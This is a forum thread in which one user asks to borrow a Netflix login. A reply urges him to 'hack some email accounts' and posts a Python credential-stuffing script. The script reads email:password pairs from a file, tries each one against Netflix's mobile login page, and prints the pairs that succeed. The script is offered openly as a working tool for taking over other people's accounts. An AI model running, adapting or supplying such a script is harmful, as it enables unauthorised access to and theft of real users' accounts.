Results 1 to 2 of 2

Thread: Can anyone lend me there netflix please?

  1. #1

    Joined
    Dec 2011
    Posts
    1,419
    Thanks
    644
    Thanked
    71/63
    DL/UL
    8/0
    Mentioned
    128 times
    Time Online
    34d 15h 20m
    Avg. Time Online
    11m

    Can anyone lend me there netflix please?

    Just for tonight as I have my own netflix but my sister always changes the pw and she's asleep as it's 1:33 AM -___-
    +Full rep!

  2. #2

    Joined
    Jun 2012
    Posts
    1,699
    Thanks
    876
    Thanked
    2,881/1,142
    DL/UL
    44/1
    Mentioned
    562 times
    Time Online
    118d 6h 45m
    Avg. Time Online
    40m
    Hack some email accounts:

    (you need an account to see links)

    (you need an account to see links)

    find one with netflix... this might help... ( I made it about a year ago)


    import urllib2, re, hashlib
    import socket
    from urllib import urlencode
    from cookielib import CookieJar
    import time
    import urllib

    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(C ookieJar()))





    def logintest(theusername,thepassword):
    #preload a game using all gsi urls


    finalhtml = opener.open('https://www2.netflix.com/Mobile/')
    strhtml1= finalhtml.read()




    postdata = urlencode({
    "email" : theusername,
    "submit" : "submit",

    "password1" : thepassword,
    'SubmitButton' : 'Click Here to Continue',
    'nextpage' : 'http://www2.netflix.com/Mobile',
    'RememberMe' : 'true',
    })
    finalhtml = opener.open('https://www2.netflix.com/Mobile/Login/', postdata)
    strhtml2= finalhtml.read()
    if strhtml2.find("The login information you entered does not match an account in our records.") <10 :
    print theusername , ":" , thepassword


    file = open("accs.txt")

    while 1:
    line = file.readline()
    if not line:
    break
    pass # do something
    lines = line.split(":")
    logintest(lines[0],lines[1])
    time.sleep(5)

  3. The Following User Says Thank You to DarkByte For This Useful Post:

    Mikey (10-09-2012)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •